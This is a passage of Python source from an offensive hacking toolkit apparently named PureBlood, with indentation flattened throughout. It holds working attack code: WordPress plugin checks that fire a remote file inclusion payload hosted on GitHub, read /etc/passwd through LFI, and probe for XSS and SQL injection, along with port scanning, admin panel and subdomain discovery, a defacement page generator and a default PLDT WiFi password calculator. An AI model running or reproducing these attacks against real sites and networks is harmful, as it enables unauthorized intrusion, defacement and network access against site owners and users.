wp_plugin_booking_calendar = requests.get(wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php')
if wp_plugin_booking_calendar.status_code == 200:
wp_plugin_booking_calendar = wp_plugin_booking_calendar
wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
else:
wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
wp_plugin_booking_calendar = 'Not Found'
if wp_plugin_booking_calendar == 'Not Found':
wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
print ('\t[!] - 404 Found! ~ ' + wp_plugin_booking_calendar_wvc_url)
else:
print ('\t[+] - XSS Maybe Vulnerable! ~ ' + wp_plugin_booking_calendar_wvc_url + '?month=<XSS Payload>')
print ('\t[+] - SQLMap Maybe Vulnerable! ~ ' + wp_plugin_booking_calendar_wvc_url + '?month=')
print ('\t[+] - Unfortunately I can\'t handle alerts without using Selenium and you should manually use SQLMap. Try to do it manually')
print ('\n\n[#] - Checking (WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion):')
wp_plugin_wp_spritz_wvc_url = ''
wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php')
if wp_plugin_wp_spritz.status_code == 200:
wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?wvc_url=https://raw.githubusercontent.com/cr4shcod3/pureblood/master/l33t/rfi.txt')
wp_plugin_wp_spritz_wvc_url = wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?wvc_url=https://raw.githubusercontent.com/cr4shcod3/pureblood/master/l33t/rfi.txt'
if 'PureBlood RFI ~Cr4sHCoD3' in wp_plugin_wp_spritz.text:
print ('\t[+] - Vulnerable! ~ ' + wp_plugin_wp_spritz_wvc_url)
wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?wvc_url=/etc/passwd')
if wp_plugin_wp_spritz.status_code == 403 or wp_plugin_wp_spritz.status_code == 400:
print ('\t[+] - Try to bypass LFI! ~ ' + wp_woocommerce_wvc_url)
elif 'The page you are trying to access is restricted due to a security rule.' in wp_plugin_wp_spritz.text:
print ('\t[+] - Try to bypass LFI! ~ ' + wp_woocommerce_wvc_url)
elif wp_plugin_wp_spritz.status_code == 404:
wp_plugin_wp_spritz_wvc_url = wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php'
print ('\t[!] - 404 Found! ~ ' + wp_plugin_wp_spritz_wvc_url)
print ('\n\n[#] - Checking (WordPress Plugin Events Calendar - \'event_id\' SQL Injection):')
wp_plugin_events_calendar_wvc_url = ''
wp_plugin_events_calendar = requests.get(wvc_url + '/event.php?event_id=1')
if wp_plugin_events_calendar.status_code == 200:
wp_plugin_events_calendar_result = ''
wp_plugin_events_calendar = requests.get(wvc_url + '/event.php?event_id=1\'')
wp_plugin_events_calendar_wvc_url = wvc_url + '/event.php?event_id=1\''
for db, errors in dbms_errors.items():
for error in errors:
if re.compile(error).search(wp_plugin_events_calendar.text):
wp_plugin_events_calendar_result = 'Vulnerable'
print ('\t[+] - ' + db + ' Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
if wp_plugin_events_calendar_result == '':
print ('\t[!] - Not Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
elif wp_plugin_events_calendar.status_code == 404:
wp_plugin_events_calendar = requests.get(wvc_url + '/view-event.php?event_id=1')
wp_plugin_events_calendar_wvc_url = wvc_url + '/view-event.php?event_id=1'
if wp_plugin_events_calendar.status_code == 200:
wp_plugin_events_calendar_result = ''
wp_plugin_events_calendar = requests.get(wvc_url + '/view-event.php?event_id=1\'')
wp_plugin_events_calendar_wvc_url = wvc_url + '/view-event.php?event_id=1\''
for db, errors in dbms_errors.items():
for error in errors:
if re.compile(error).search(wp_plugin_events_calendar.text):
wp_plugin_events_calendar_result = 'Vulnerable'
print ('\t[+] - ' + db + ' Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
if wp_plugin_events_calendar_result == '':
print ('\t[!] - Not Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
elif wp_plugin_events_calendar.status_code == 404:
print ('\t[!] - 404 Found! ~ ' + wp_plugin_events_calendar_wvc_url)
class WebPentest:
def banner_grab(self, bg_url):
banner_grab_request = requests.get(bg_url)
banner_grab_result = banner_grab_request.headers
banner_grab_result = str(banner_grab_result).replace("{'", "").replace("'}", "").replace("': '", ": ").replace("', '", ",\n")
self.banner_grab_result = banner_grab_result
return self.banner_grab_result
def whois(self, w_url):
whois_query = whois.whois(w_url)
self.whois_result = whois_query
return self.whois_result
def traceroute(self, t_hostname):
traceroute_request = requests.get('https://api.hackertarget.com/mtr/?q=' + t_hostname)
traceroute_response = traceroute_request.text
traceroute_final = """{0}""".format(str(traceroute_response))
self.traceroute_result = traceroute_final
return self.traceroute_result
def dns_record(self, dr_hostname):
dns_record_list = []
for i in ids:
t = threading.Thread(target=dns_record_scanner, args=(dr_hostname, i, dns_record_list, ))
t.start()
t.join()
self.dns_record_result = dns_record_list
return self.dns_record_result
def reverse_dns_lookup(self, rdl_ip):
rdl_ip = rdl_ip + '/24'
reverse_dns_lookup_request = requests.get('https://api.hackertarget.com/reversedns/?q=' + rdl_ip)
reverse_dns_lookup_response = reverse_dns_lookup_request.text
reverse_dns_lookup_final = """{0}""".format(str(reverse_dns_lookup_response))
self.reverse_ip_lookup_result = reverse_dns_lookup_final
return self.reverse_ip_lookup_result
def zone_transfer_lookup(self, ztl_hostname):
zone_transfer_lookup_request = requests.get('https://api.hackertarget.com/zonetransfer/?q=' + ztl_hostname)
zone_transfer_lookup_response = zone_transfer_lookup_request.text
zone_transfer_lookup_final = """{0}""".format(str(zone_transfer_lookup_response))
self.zone_transfer_lookup_result = zone_transfer_lookup_final
return self.zone_transfer_lookup_result
def port_scan(self, ps_hostname, ps_pend): #https://stackoverflow.com/a/38210023
port_scan_list = []
threads = []
output = {}
delay = 10
for i in range(ps_pend + 1):
t = threading.Thread(target=TCP_connect, args=(ps_hostname, i, delay, output))
threads.append(t)
for i in range(ps_pend + 1):
threads[i].start()
for i in range(ps_pend + 1):
threads[i].join()
for i in range(ps_pend + 1):
if output[i] == 'Open':
port_scan_list.append('[+] Port Open - ' + str(i))
self.port_scan_result = port_scan_list
return self.port_scan_result
def admin_panel_scan(self, ads_url):
admin_panel_valid = []
admin_panel_redirect = []
ads_urls = []
r_path = []
ads_r_urls = []
robots = ['/robot.txt', '/robots.txt']
for i in admin_panel_list:
ads_urls.append(ads_url + i)
for i in robots:
r_robots = requests.get(ads_url + i)
if r_robots.status_code == 200:
r_robots = r_robots
else:
r_robots = ''
if r_robots == '':
pass
else:
robots = str(r_robots.text)
for i in robots.split("\n"):
if i.startswith('Allow'):
r_path.append(i.split(': ')[1].split(' ')[0])
elif i.startswith('Disallow'):
r_path.append(i.split(': ')[1].split(' ')[0])
for i in r_path:
ads_r_urls.append(ads_url + i)
for i in ads_r_urls:
ads_r_urls_request = requests.get(i)
if 'Admin' in ads_r_urls_request.text or 'Login' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
elif 'admin' in ads_r_urls_request.text or 'login' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
elif 'Username' in ads_r_urls_request.text or 'Password' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
elif 'username' in ads_r_urls_request.text or 'password' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
else:
r_admin_panel = None
if not admin_panel_valid:
for i in ads_urls:
admin_scan_request = requests.get(i)
if admin_scan_request.status_code == 200:
admin_panel_valid.append(i)
break
elif admin_scan_request.status_code == 301 or admin_scan_request.status_code == 302:
admin_panel_redirect.append(i)
else:
pass
admin_panel_valid = list(set(admin_panel_valid))
for i in admin_panel_redirect:
admin_panel_valid.append(i + ' - 301')
if not admin_panel_valid:
webbrowser.open_new_tab(google_hacking + 'site:' + ads_url + '+inurl:login | admin | user | cpanel | account | moderator | phpmyadmin | /cp')
self.admin_panel_scan_result = admin_panel_valid
return self.admin_panel_scan_result
def subdomain_scan(self, ss_hostname, subdomain_list):
so_200 = []
so_301 = []
so_302 = []
so_403 = []
ss_urls = []
ss_subdomain_list = open(subdomain_list, 'r')
ss_subdomain_list = ss_subdomain_list.read().splitlines()
for i in ss_subdomain_list:
ss_urls.append(i + '.' + ss_hostname)
for i in ss_urls:
t = threading.Thread(target=subdomain_scanner, args=(i, so_200, so_301, so_302, so_403,))
t.start()
t.join()
self.ss_200_result = so_200
self.ss_301_result = so_301
self.ss_302_result = so_302
self.ss_403_result = so_403
return self.ss_200_result, self.ss_301_result, self.ss_302_result, self.ss_403_result
def cms_detect(self, cd_hostname):
cd_cms = []
cd_cms_version = []
cms_detect_request = requests.get('https://whatcms.org/?s=' + cd_hostname)
cd_soup = BeautifulSoup(cms_detect_request.content, 'html.parser')
cd_soup_div = cd_soup.find('div', attrs={'class': 'large text-center'})
for i in cd_soup_div.find_all('span', attrs={'class': 'nowrap'}):
cd_cms_version.append(i.text)
cd_cms.append(cd_soup_div.find('a').text)
if not cd_cms:
cms_detect_final = '[!] - There\'s no CMS Detected!'
else:
cd_cms_version = cd_cms_version[1]
cms_detect_final = cd_cms[0].replace('/c/', '')
cms_detect_final = cms_detect_final + ' - ' + cd_cms_version
self.cms_detect_result = cms_detect_final
return self.cms_detect_result
def reverse_ip_lookup(self, ril_hostname):
reverse_ip_lookup_request = requests.get('https://api.hackertarget.com/reverseiplookup/?q=' + ril_hostname)
reverse_ip_lookup_response = reverse_ip_lookup_request.text
reverse_ip_lookup_final = """{0}""".format(str(reverse_ip_lookup_response))
self.reverse_ip_lookup_result = reverse_ip_lookup_final
return self.reverse_ip_lookup_result
def subnet_lookup(self, subnet_input):
subnet_lookup_request = requests.get('https://api.hackertarget.com/subnetcalc/?q=' + subnet_input)
subnet_lookup_response = subnet_lookup_request.text
subnet_lookup_final = """{0}""".format(str(subnet_lookup_response))
self.subnet_lookup_result = subnet_lookup_final
return self.subnet_lookup_result
def links_extract(self, le_url):
links_extract_request = requests.get('https://api.hackertarget.com/pagelinks/?q=' + le_url)
links_extract_response = links_extract_request.text
links_extract_final = """{0}""".format(str(links_extract_response))
self.links_extract_result = links_extract_final
return self.links_extract_result
def directory_fuzz(self, df_url, directory_list):
directory_fuzz_final1 = []
directory_fuzz_final2 = []
directory_fuzz_final3 = []
directory_list_open = open(directory_list, 'r')
directory_list = directory_list_open.read().splitlines()
df_url_list = []
ii = 0
for i in directory_list:
if '/' in directory_list[ii]:
df_url_list.append(df_url + i)
else:
df_url_list.append(df_url + '/' + i)
ii = ii + 1
for i in df_url_list:
print (i)
t = threading.Thread(target=directory_scanner, args=(i, directory_fuzz_final1, directory_fuzz_final2, directory_fuzz_final3))
t.start()
t.join()
self.directory_fuzz_result1 = directory_fuzz_final1
self.directory_fuzz_result2 = directory_fuzz_final2
self.directory_fuzz_result3 = directory_fuzz_final3
return self.directory_fuzz_result1, self.directory_fuzz_result2, self.directory_fuzz_result3\
def file_fuzz(self, ff_url, file_list):
file_fuzz_final1 = []
file_fuzz_final2 = []
file_fuzz_final3 = []
file_list_open = open(file_list, 'r')
file_list = file_list_open.read().splitlines()
ff_url_list = []
for i in file_list:
ff_url_list.append(ff_url + '/' + i)
for i in ff_url_list:
t = threading.Thread(target=file_scanner, args=(i, file_fuzz_final1, file_fuzz_final2, file_fuzz_final3))
t.start()
t.join()
self.file_fuzz_result1 = file_fuzz_final1
self.file_fuzz_result2 = file_fuzz_final2
self.file_fuzz_result3 = file_fuzz_final3
return self.file_fuzz_result1, self.file_fuzz_result2, self.file_fuzz_result3
def shodan_search(self, query, ss_SHODAN_API_KEY):
shodan_api = shodan.Shodan(ss_SHODAN_API_KEY)
try:
shodan_search_results = shodan_api.search(query)
self.shodan_search_result = shodan_search_results
return self.shodan_search_result
except shodan.APIError as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
web_pentest()
def shodan_host_lookup(self, shodan_host, shl_SHODAN_API_KEY):
shodan_api = shodan.Shodan(shl_SHODAN_API_KEY)
try:
shodan_host_lookup_results = shodan_api.host(shodan_host)
self.shodan_host_lookup_result = shodan_host_lookup_results
return self.shodan_host_lookup_result
except shodan.APIError as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
web_pentest()
def clear():
if platform.system() == 'Linux':
os.system('clear')
elif platform.system() == 'Windows':
os.system('cls')
elif platform.system() == 'Darwin':
os.system('clear')
else:
os.system('clear')
def banner():
try:
if sys.version_info[0] == 3:
banner = ("""{1}
██▓███ █ ██ ██▀███ ▓█████ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓██░ ██▒ ██ ▓██▒▓██ ▒ ██▒▓█ ▀ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▓██░ ██▓▒▓██ ▒██░▓██ ░▄█ ▒▒███ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌
▒██▄█▓▒ ▒▓▓█ ░██░▒██▀▀█▄ ▒▓█ ▄ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌
▒██▒ ░ ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓
▒▓▒░ ░ ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒
░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
{2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold))
elif sys.version_info[0] == 2:
banner = ("""{1}
██▓███ █ ██ ██▀███ ▓█████ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓██░ ██▒ ██ ▓██▒▓██ ▒ ██▒▓█ ▀ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▓██░ ██▓▒▓██ ▒██░▓██ ░▄█ ▒▒███ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌
▒██▄█▓▒ ▒▓▓█ ░██░▒██▀▀█▄ ▒▓█ ▄ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌
▒██▒ ░ ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓
▒▓▒░ ░ ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒
░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
{2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold)).decode('utf-8')
print (banner)
except:
if sys.version_info[0] == 3:
banner = ("""{1}
o--o o--o o o
| | | | | |
O--o o o o-o o-o O--o | o-o o-o o-O
| | | | |-' | | | | | | | | |
o o--o o o-o o--o o o-o o-o o-o
{2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold))
elif sys.version_info[0] == 2:
banner = ("""{1}
o--o o--o o o
| | | | | |
O--o o o o-o o-o O--o | o-o o-o o-O
| | | | |-' | | | | | | | | |
o o--o o o-o o--o o o-o o-o o-o
{2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold)).decode('utf-8')
print (banner)
def set_target(target, wfunc):
global url
global hostname
global ip
if 'http://' in target:
url = target
hostname = target.replace('http://', '')
elif 'https://' in target:
url = target
hostname = target.replace('https://', '')
if '://' not in target:
url = 'http://' + target
hostname = target
if '1' == target[0] or '2' == target[0] or '3' == target[0] or '4' == target[0] or '5' == target[0] or '6' == target[0] or '7' == target[0] or '8' == target[0] or '9' == target[0]:
ip = target
elif '=' in target:
ip = None # This is it for now.
else:
ip = socket.gethostbyname(hostname)
if wfunc == 1:
web_pentest()
elif wfunc == 2:
web_application_attack()
else:
main()
def generator():
print ("""{3}[ {5}Generator {3}]
{2}01{3}) {5}Deface Page Generator
{2}02{3}) {5}Password Generator
{2}03{3}) {5}PLDT WiFi Password Calculator
{2}04{3}) {5}Text To Hash
{2}90{3}) {5}Back To Menu
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PureBlood{1}({3}Generator{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
generator()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PureBlood{1}({3}Generator{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
generator()
cgenerator = Generator()
if choice == 1:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
if sys.version_info[0] == 3:
title = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Title{1})> {2}'.format(green, blue, cyan, red)))
shortcut_icon = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Shortcut Icon{1})> {2}'.format(green, blue, cyan, red)))
meta_description = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Description{1})> {2}'.format(green, blue, cyan, red)))
meta_image = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Image{1})> {2}'.format(green, blue, cyan, red)))
logo = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Logo{1})> {2}'.format(green, blue, cyan, red)))
hacker_name = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Hacker Name{1})> {2}'.format(green, blue, cyan, red)))
message1 = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 1{1})> {2}'.format(green, blue, cyan, red)))
message2 = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 2{1})> {2}'.format(green, blue, cyan, red)))
groups = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Group/s{1})> {2}'.format(green, blue, cyan, red)))
deface_page_output_filename = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Output Filename{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
title = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Title{1})> {2}'.format(green, blue, cyan, red)))
shortcut_icon = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Shortcut Icon{1})> {2}'.format(green, blue, cyan, red)))
meta_description = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Description{1})> {2}'.format(green, blue, cyan, red)))
meta_image = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Image{1})> {2}'.format(green, blue, cyan, red)))
logo = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Logo{1})> {2}'.format(green, blue, cyan, red)))
hacker_name = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Hacker Name{1})> {2}'.format(green, blue, cyan, red)))
message1 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 1{1})> {2}'.format(green, blue, cyan, red)))
message2 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 2{1})> {2}'.format(green, blue, cyan, red)))
groups = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Group/s{1})> {2}'.format(green, blue, cyan, red)))
deface_page_output_filename = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Output Filename{1})> {2}'.format(green, blue, cyan, red)))
gdeface_page = cgenerator.deface_page(title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups)
if '.html' in deface_page_output_filename:
deface_page_output_filename = deface_page_output_filename
else:
deface_page_output_filename = deface_page_output_filename + '.html'
deface_page_output_file = open('outputs/generator/' + deface_page_output_filename, 'w+')
deface_page_output_file.write(gdeface_page)
deface_page_output_file.close()
print ('\nOutput saved in outputs/generator/' + deface_page_output_filename + '{0}')
print (reset + bold)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 2:
if sys.version_info[0] == 3:
length = int(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Length{1})> {2}'.format(green, blue, cyan, red)))
text = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
length = int(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Length{1})> {2}'.format(green, blue, cyan, red)))
text = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
gpassword_generator1, gpassword_generator2, gpassword_generator3 = cgenerator.password_generator(length, text)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ('Random Password: ' + gpassword_generator1)
print ('MD5: ' + gpassword_generator2)
print ('L33T: ' + gpassword_generator3)
print (reset)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 3:
if sys.version_info[0] == 3:
print ('{2}[{1}#{2}] {3}- {4}Last 5 Numbers if any. EX: PLDTHOMEDSLXXXXX where X is the number{0}'.format(reset, green, blue, yellow, cyan))
digit5 = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 Digit{1})> {2}'.format(green, blue, cyan, red)))
print ('{2}[{1}#{2}] {3}- {4}Last 5 MAC Characters. EX: 00:4a:00:d0:44:c0 where 044C0 is the last 5 MAC Characters{0}'.format(reset, green, blue, yellow, cyan))
mac5 = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 MAC Char{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
print ('{2}[{1}#{2}] {3}- {4}Last 5 Numbers if any. EX: PLDTHOMEDSLXXXXX where X is the number{0}'.format(reset, green, blue, yellow, cyan))
digit5 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 Digit{1})> {2}'.format(green, blue, cyan, red)))
print ('{2}[{1}#{2}] {3}- {4}Last 5 MAC Characters. EX: 00:4a:00:d0:44:c0 where 044C0 is the last 5 MAC Characters{0}'.format(reset, green, blue, yellow, cyan))
mac5 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 MAC Char{1})> {2}'.format(green, blue, cyan, red)))
gpldt_password_calculator1, gpldt_password_calculator2, gpldt_password_calculator3, gpldt_password_calculator4, gpldt_password_calculator5 = cgenerator.pldt_password_calculator(digit5, mac5)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ('[#] - Possible Password of the PLDT WIFI:')
print ('\nFOR : PLDTHOMEDSL, PLDTmyDSLPAL, and PLDTmyDSLBiz')
for i in gpldt_password_calculator1:
print (' > ' + i)
print ('\nFOR : PLDTHOMEDSLxxxxx')
for i in gpldt_password_calculator2:
print (' > ' + i)
print ('\nFOR : PLDTHOMEFIBR_xxxxxx')
print (' > ' + gpldt_password_calculator3)
print ('\nFOR : PLDTHOMEFIBRxxxxxx')
for i in gpldt_password_calculator4:
print (' > ' + i)
print ('\nFOR : HomeBro_Ultera')
print (' > ' + gpldt_password_calculator5)
print (reset)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 4:
if sys.version_info[0] == 3:
text = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}TextToHash{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
text = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}TextToHash{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
gtext_to_hash = cgenerator.text_to_hash(text)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print (gtext_to_hash)
print (reset)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 90:
main()
elif choice == 99:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
generator()
'''def network_pentest():
print ("""\n\n
{3}[ {5}Network Pentest {3}]
{2}01{3}) {5}?
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PureBlood{1}({3}NetworkPentest{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
try:
print ('')
# print ('\n[+] - Output saved in outputs/network_pentest/' + network_pentest_output)
except:
pass
print ('\n{2}[{1}+{2}] {3}- {4}Exiting...{0}'.format(reset, green, blue, yellow, cyan))
sys.exit()
except ValueError:
print ('{2}[{1}+{2}] {3}- {4}Please enter a valid number!{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
main()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PureBlood{1}({3}NetworkPentest{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
try:
print ('')
# print ('\n[+] - Output saved in outputs/network_pentest/' + network_pentest_output)
except:
pass
print ('\n{2}[{1}+{2}] {3}- {4}Exiting...{0}'.format(reset, green, blue, yellow, cyan))
sys.exit()
except ValueError:
print ('{2}[{1}+{2}] {3}- {4}Please enter a valid number!{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
main()
if choice == 1:
main()
elif choice == 90:
main()
elif choice == 95:
print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
set_target(target, 3)
elif choice == 99:
print ('\n{2}[{1}+{2}] {3}- {4}Exiting...{0}'.format(reset, green, blue, yellow, cyan))
sys.exit()
else:
print ('{2}[{1}+{2}] {3}- {4}Please enter a valid choice!{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
network_pentest()'''
def web_application_attack():
global cweb_application_atttack
print ("""{3}[ {5}Web Application Attack {3}]
{2}01{3}) {5}Wordpress
{2}02{3}) {5}SQL Injection
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PureBlood{1}({3}WebApplicationAttack{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
